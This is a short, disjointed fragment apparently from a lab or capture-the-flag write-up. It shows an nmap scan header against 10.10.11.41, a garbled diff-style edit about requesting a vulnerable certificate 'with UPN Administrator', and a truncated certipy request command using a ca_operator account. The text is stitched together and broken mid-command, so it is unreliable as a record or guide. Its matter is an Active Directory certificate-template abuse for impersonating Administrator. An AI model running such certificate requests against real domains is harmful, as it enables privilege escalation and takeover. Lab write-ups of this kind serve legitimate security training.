Nmap 7.94SVN scan initiated Tue Mar 18 13:17:25 2025 as: /usr/lib/nmap/nmap --privileged -n -Pn -v -sC -sV -oN nmap.txt 10.10.11.41

 - The vulnerable certificate can be requested as

-but now with UPNAdministrator
+ca_operatorbut now with UPNAdministrator.

 kali@kali:~$ certipy req -username ca_operator \